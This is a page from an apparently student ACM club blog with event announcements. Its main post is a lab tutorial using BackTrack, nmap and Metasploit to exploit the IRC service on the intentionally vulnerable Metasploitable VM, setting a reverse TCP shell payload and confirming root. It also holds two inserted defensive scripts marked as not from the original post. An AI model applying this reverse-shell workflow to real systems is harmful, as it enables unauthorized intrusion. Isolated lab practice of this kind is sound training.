Posted on February 6, 2013
Ever since I started studying Computer Science I have struggled to find a good way to differentiate it from mathematics. Mathematicians use computers. Mathematicians even write code. Computer scientists certainly prove things, well at least some of them. And they definitely use mathematics. So what is the difference?
I think today I found my answer. I was re-reading my data structures textbook for fun and found my answer. It was nestled in there between a discussion of selection sort and shell sort. Just a little musing by the author. The discussion was on lower bounded algorithms and how their analysis is difficult. Why is it difficult? For a computer scientist to prove all sorting algorithms are bounded below by big-omega of n-squared, on average with adjacent exchange of elements, would require running all of the possible algorithms of this kind.
If you try to do this you will fail, because there are infinitely many ways to do this (some will argue). At least in theory there seems to be. I think you could verify it for a given time period because of a lack of known possible technologies. So you could configure your hardware in a very large known possible number of ways, to get this finite approximation. However every time new technology is discovered, you would have to add to the possible permutations. But that’s not the point. (Just an aside).
The point is, a computer scientist is not satisfied until they actually run an experiment on a computer. In fact, they aren’t satisfied until they run a lot of experiments on a computer. Whereas for a mathematician, the proof is enough. The proof in fact, is the proof that something is true or not. Whereas the computer scientist requires physical results. This seems to me a curious fact.
I think this is why computer scientists refer to themselves as scientists, because CS is an experimental science. Mathematics is too, in the sense that both disciplines play with thought experiments. Mathematicians simply choose to do their thought experiments on paper, whereas computer scientists prefer screens.
Today we will go through the talk I gave at the ACM club last semester. I will also be talking about some resources for you, the student interested in cyber security.
Today we will be talking about backtrack and metasploitable.
Backtrack: an operating system used to penetration test systems around the world.
metasploitable: an operating system that is vulnerable, on purpose, so you can understand how to attack stuff.
Backtrack is basically an Ubuntu distribution with a bunch of cyber security tools tacked on. I recommend running backtrack through a VM rather than giving it a whole computer. While backtrack is pretty awesome, it’s still a specialized OS. If you are serious about security you should give it at least 100 gigs of space. (You’ll need this for nexpose).
So let’s get started:
Today we are going to use backtrack to attack metasploitable. We could attack one of many, many vulnerabilities, but for convenience we will be exploiting the IRC vulnerability that comes with metasploitable.
So first you’ll need to download metasploitable and backtrack.
You can get a lot more packages at sourceforge that are exploitable. I highly recommend poking around and seeing what you can play with!!!
Alright, next you need virtual box (or some other virtualization software):
There are a lot of reasons why virtual box is awesome. However if we start getting into virtualization, we will probably never get to breaking into anything. You can look for other posts by me on virtualization in the near future.
Important note: Not all processors support virtualization (most new CPUs do). You can check this by running:
dmesg | less
Look for statements like: “kvm: disabled by bios” and “kvm: no hardware support”
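The same check as a script, as an added example that is not part of the original post: it looks for the two kernel messages quoted above and, if neither is present, for the vmx (Intel VT-x) or svm (AMD-V) flag in /proc/cpuinfo. The verdict names, the --live switch and the sample inputs are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): classify hardware virtualization
# support from /proc/cpuinfo text and kernel log (dmesg) text.

# classify_virt CPUINFO_TEXT KERNEL_LOG_TEXT -> prints one verdict word
classify_virt() {
    cpuinfo=$1
    klog=$2
    # The kernel log is checked first: it names the firmware lock explicitly.
    if printf '%s\n' "$klog" | grep -qi 'kvm: disabled by bios'; then
        echo "disabled-in-firmware"   # CPU is capable; enable VT-x/AMD-V in setup
    elif printf '%s\n' "$klog" | grep -qi 'kvm: no hardware support'; then
        echo "no-hardware-support"
    # Intel VT-x appears as the "vmx" CPU flag, AMD-V as "svm".
    elif printf '%s\n' "$cpuinfo" |
         grep -Eq '^flags[[:space:]]*:.*[[:space:]](vmx|svm)([[:space:]]|$)'; then
        echo "supported"
    else
        echo "not-detected"           # no flag and no kvm message in the log
    fi
}

# Constructed sample inputs (not captured from a real machine).
CPU_WITH_VMX='processor : 0
flags     : fpu vme de pse msr vmx smx est'
CPU_NO_VT='processor : 0
flags     : fpu vme de pse msr est'
LOG_BIOS_LOCK='[   12.345678] kvm: disabled by bios'
LOG_NO_HW='[   12.345678] kvm: no hardware support'

# Live use: run with --live to classify the current host.
if [ "${1:-}" = "--live" ]; then
    classify_virt "$(cat /proc/cpuinfo)" "$(dmesg 2>/dev/null)"
fi
```

On systems that restrict dmesg to root, run the live check with sufficient privileges or the kernel log part will be empty.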
looking at the tutorial:
So once you have virtual box (what I am using) or your computer and you have downloaded the ISO files, you’ll need to install them.
You’ll need to do the following in virtualbox:
new->name: backtrack -> memory size: 1024 (just what I used) ->create a virtual hard drive now->VDI->fixed size-> 100 GB
Then you need to click on the newly created hard drive, hit the folder button, find the backtrack ISO and then hit start.
You’ll need to do the same thing for metasploitable.
Okay, now we are ready to do some hacking (almost).
Now we need to adjust some settings in our virtual machines.
Go into settings->network
You’ll need a host only adapter for both metasploitable and backtrack. MAKE SURE YOU DO NOT GIVE METASPLOITABLE A NAT ADAPTER!!!!
If you do this you will be giving a vulnerable operating system access to the internet. Doing this will mean your system is very easily compromisable. Essentially it’s like putting up a white flag, then running up to everyone that would want to kill you and asking them to shoot you, with a very large gun, on the whole internet.
What your system should look like at this point:
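One way to verify the adapter setting before booting the vulnerable VM, as an added example that is not part of the original post: it reads the output of VBoxManage showvminfo --machinereadable and lists every adapter that is not host-only, internal-network or unplugged. Treating internal-network and unplugged adapters as acceptable is an assumption of this example, and the sample outputs are constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): flag VirtualBox adapters that
# could give a lab VM a route off the host.
# Input: text printed by  VBoxManage showvminfo "<vm name>" --machinereadable

# Reads that text on stdin, prints "nicN=<mode>" for each adapter outside the
# allowlist, and returns 1 if any was found.
check_nics() {
    awk -F= '
        BEGIN { bad = 0 }
        # Match nic1=, nic2=, ... but not nictype1= or nicspeed1=
        /^nic[0-9]+=/ {
            mode = $2
            gsub(/"/, "", mode)
            # hostonly and intnet stay on the host; none means no adapter.
            # Anything else (nat, bridged, natnetwork, ...) is reported.
            if (mode != "hostonly" && mode != "intnet" && mode != "none") {
                print $1 "=" mode
                bad = 1
            }
        }
        END { exit bad }
    '
}

# Constructed sample outputs (not captured from a real VM).
SAFE_SAMPLE='name="metasploitable"
nic1="hostonly"
nictype1="82540EM"
hostonlyadapter1="vboxnet0"
nic2="none"'
RISKY_SAMPLE='name="metasploitable"
nic1="nat"
nictype1="82540EM"
nic2="hostonly"
hostonlyadapter2="vboxnet0"'

# Live use: pass the VM name as the first argument.
if [ -n "${1:-}" ]; then
    if VBoxManage showvminfo "$1" --machinereadable | check_nics; then
        echo "OK: $1 has only isolated adapters"
    else
        echo "WARNING: change the adapters listed above before booting $1"
    fi
fi
```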
You should also have a metasploitable window that looks like this:
Once you start backtrack you will need to do the following:
hit enter at boot:
Then you will need to hit text-only mode (whatever the first option is)
And a backtrack window that looks like this:
Now just type in “startx” and you will get to a GUI.
If you want to do everything from the command line, you can, but I don’t recommend it.
Okay, so now we are going to get to the attacking part!!!!
I recommend going through each of the open ports in metasploitable, because attacking each service is good experience. Typically, non-vulnerable machines will have at most 2 open ports. In the case of mac you won’t see any (I tried this last night).
So first you will need to log into metasploitable, the username and password are: msfadmin
now run ifconfig
Notice the IP address: 192.168.56.102. This is what we care about.
Now go into your backtrack VM
We will be running the command nmap -A -v 192.168.56.102 (This is the ip address of metasploitable in our example)
It is important to note that this may be different on your machine. You should run ifconfig on the metasploitable VM to be sure.
If you ran nmap correctly, you should get a list of all the open ports on metasploitable, looks like 23 in all. (Quite a bit of practice)
Each of the ports is a specific service, which has a networking protocol. Typically a service will run over the same port. For instance, port 80 is HTTP. (We can see it’s listed here)
This is how metasploit will know what services our target machine is running. (If we were attacking a real system we would scan for a whole bunch of ports, rather than just one.)
Now open a new terminal in backtrack and run
This is metasploit, the penetration testing framework.
now run the command search scanner
This will give you a listing of all the exploits available. Since we are going to attack IRC, we want to run:
Now all we need to do is type:
Then type show options
then type set RHOST 192.168.56.102 (this is metasploitable’s IP address)
Then type show payloads
Then you need to set a payload using
set PAYLOAD generic/shell_reverse_tcp
Now we have to set our host IP address. For this run ifconfig in metasploit in a separate window.
Now run set LHOST 192.168.56.101 (backtrack’s ip address in our example)
Now simply type exploit
If all went well, you should see the screen above. Just type whoami
If you see root, then you got root access!!! (the holy grail of all cyber security challenges)
Now let’s talk about references.
This is a short list I have compiled of ways to improve your skills as a cyber security expert:
http://isisblogs.poly.edu/ <- nyu-poly’s blog
This blog is home to some of the most badass hackers and cyber security experts I know. You can trust anything that is written here.
This is Dan Guido’s homepage. He is one of the most knowledgeable hackers I have ever heard lecture.
A great blog, filled with tutorials and interesting articles, I highly recommend this as a secondary source to the isis blog.
Where to get pretty much any security tool you could want, for free.
A decent description of cyber security terms
A series of lectures for those interested in the policy side of cyber security
A decent overview of cybersecurity topics
More policy things.
Government R&D website
Lots and lots of security videos (some of them you have to pay for)
An overview of tools by the us government.
the reverse engineering subreddit, need I say more?
Today will begin a series of posts on cyber security. I hope you will all enjoy these. I plan to update the blog with a new tutorial I’m working on at least once a week. Over the breaks probably many times a week.
So why should you care about cyber security? I would say there are as many reasons as there are examples of code on the internet; however, it’s also because it’s a lot of fun. Cyber security can motivate many of the technical aspects of computer science and breathe life into them. Suddenly pointers, instruction sets, buffers, the stack, internet protocols, and much more are accessible and useful. The question is no longer “Why do we need to learn this? High-level languages like Python do all of it for you.” It becomes “What can we cover next?”
This is because you will understand how to exploit these constructs to solve a puzzle. The puzzle is usually, how do I get root access to this system? But it might be how do I get this piece of information? Or how do I get this machine to stop running without pressing the off button? Or how do I intercept this communication before it goes from point A to point B? Or many other interesting questions that require understanding of the internals of computational systems in a fundamental way.
In this first post, I want you to understand the skills a security professional needs. It should be understood that these skills are only requisite if you want deep mastery of computer science and cyber security. However these skills will come with time, they are not prerequisite to beginning your journey into deep mastery of cyber security and computer science.
So what will you know once you have an understanding of cyber security?
-C (the programming language)
-code auditing: reading large code bases easily ~3000+ lines
This is by no means an exhaustive list; however, most serious security professionals know these things incredibly well. I look forward to taking this journey with you all. Next up, an introduction to metasploit. Prerequisite knowledge – a primitive understanding of computer networking.
Hack Night is happening in t-minus 50 minutes in CIWW 311 (the ACM office!). We’ll be working with OpenCV, the pi, the Roomba, the MakerBot, and fielding questions relating to just about anything so swing by, hangout, and check out ALL THE THINGS!
Hope you all had a nice, relaxing break. Just a reminder that we’re having interview night (again) on Tuesday, March 20th, at 7pm in room 317. This is a great opportunity to learn some good techniques for CS interviews, learn what to expect from them, and get a little bit of practice with algorithm/logic questions. It’s a great opportunity if you think you might be working as a software engineer, even if you already have some experience. And we’ll have free food.
P.P.S. Unless noted otherwise, our meetings are in Courant (CIWW) at 251 Mercer Street, New York, NY
Posted on February 22, 2012
Let’s keep this blog short, so it might imitate a “tumblelog.”
Event: Derek Gottfrid (derekg.org), API lead at Tumblr, will give us an interesting tech talk about Tumblr
Date: February 27, 2012 Monday
Time: 5:30pm – 7:30pm
Location: Courant Institute Room 517
Address: 251 Mercer Street, New York
When: Tuesday, February 7th
Where: 251 Mercer St, Room 317
About the Talk
SecondMarket is continuously iterating and developing its platform for trading alternative assets. In this talk, find out from Michael Lysaght, SecondMarket’s VP of Engineering, how its technology platform has gone through a number of major overhauls, the reasons for these changes and where we are today. Also Michael will discuss how software is built at SecondMarket using a blend of Test Driven Development, Agile and Scrum.
How We Work
SecondMarket’s technology team has 45 people and is located downtown in the heart of the financial district. Even though we operate in the financial markets, our goal is to dramatically change the way in which these markets work. At our core, we operate as a small technology startup. Our development teams are cross functional comprising of Engineers, Product Management, Interaction Designers and QA, all working together on the same product. Software is developed using short development cycles of two weeks or less, so we experience the gratification of seeing our work in production quickly and often. We use industry best practices such as continuous integration and continuous deployment. Our culture is central to who we are. We encourage participation in the local NY community and we all share a passion for learning.
SecondMarket is the marketplace for alternative investments and an online destination to get market data, connect with other investors and transact in assets such as private company stock, fixed income, public equity and bankruptcy claims. SecondMarket makes it easier to transact in fragmented markets by connecting buyers and sellers in an online investment platform and providing the market and operations expertise to complete trades. Since the firm was founded in 2004, more than 75,000 individuals and institutions have signed up to SecondMarket and billions of dollars in alternative investment transactions have been completed.
Posted on January 26, 2012
Join NYU Poly’s Entrepreneurship and Innovation Association for their first event of the spring semester: Commercializing your idea! Hear start-up success stories from names like Fred Wilson of Union Square ventures, mingle with fellow entrepreneurs while you grub on delicious FREE food! EIA seeks to create an ecosystem that will build on NYU Poly’s i2e mission: providing students with the concepts of entrepreneurship, the benefits of self-employment, and the step-by-step path for launching and commercializing ideas.
When: February 10th, 4pm-6pm
Where: LC 400, @NYU Poly
Why: Because it will be awesome
For more information and to RSVP please email Polyentrepreneurs@gmail.com
ACM meetings are every Tuesday night at 7PM this semester. We have planned lots of exciting nights for you. You can take a look at our tentative agenda at http://cs.nyu.edu/~acmweb/wordpress/?page_id=25. Besides, you can sign up for our mailing list for updated information at http://bit.ly/acmatnyu. The first meeting will be next week, 31st January 2012. We are looking forward to seeing you!
Posted on April 5, 2011
1. An element of a culture or behavior that may be passed from one individual to another by nongenetic means, esp. imitation.
Have you ever wondered where memes come from? Be prepared to take a tour through the internet: the good, the bad, but mostly the ugly. The gentlemen of memefactory will take you through /b/, the rules of the internet, how to piss off Xzibit, how much power you need (hint: it’s > 9000), what you should do when the low battery light comes on and you’re busy (challenge accepted), how to save money, and more. There will be pizza and soda, as usual. Don’t miss this one. Seriously. We’ve been planning this all year.
Memefactory is Friday April 22nd at 8:30 pm in CIWW 109.
Posted on March 29, 2011
Like the video?
Just come to our weekly meetings.
The MakerBot and the EggBot are waiting for you =)
ACM @ NYU
Posted on March 22, 2011
Daniel Goddemeyer, an employee at IDEO will come in to meet us on 3/22 (first Tuesday back from break).
We will start at our usual 7 pm and would go for about an hour or so.
You will want to go to room 317 in Warren Weaver Hall (251 Mercer Street, New York NY).
What is IDEO? source: Wikipedia
IDEO is a design and innovation consultancy founded in Palo Alto, California, United States with other offices in San Francisco, Chicago, New York, Boston, London, Munich and Shanghai. The company helps design products, services, environments, and digital experiences. Additionally, the company has become increasingly involved in management consulting.
We will be having a meeting tomorrow (3/1) at 7 PM in CIWW 317. We will be working on both the 3D printer and Egg Bot, but the highlight of tomorrow will be 3 more demos. They are:
Tengchao: Another implementation of SOLE that integrates the hash function of Blake, one of the SHA-3 finalists.
Andrew: Graphics, animation, and UI with Processing
Tamreen: Quick Introduction to Haskell
See you all there!
The ACM and ADI at Columbia, as well as the ACM and tech@NYU at NYU, are excited to present a new opportunity for undergraduate students interested in the interface of technology and entrepreneurship: HackNY.
HackNY.org works to federate NYC students with NYC startups by facilitating a summer internship program and by building a community among the next generation of NYC hackers. Starting in 2010, the summer program includes pedagogical lectures as well as dinners with local and nonlocal upstarts, hackers, and founders.
All NYC students are invited to a 24-hour hackathon at NYU April 2-3, 7pm-7pm, and all NYC startups are invited to submit to demo their hot technologies, share their APIs and data, and impress NYC’s next generation of code powerhouses, many of whom will be looking for summer internships.
All students are invited to RSVP to email@example.com. Please include your full name, University, class year, and major.
All students including MS and PhD are welcome to join us!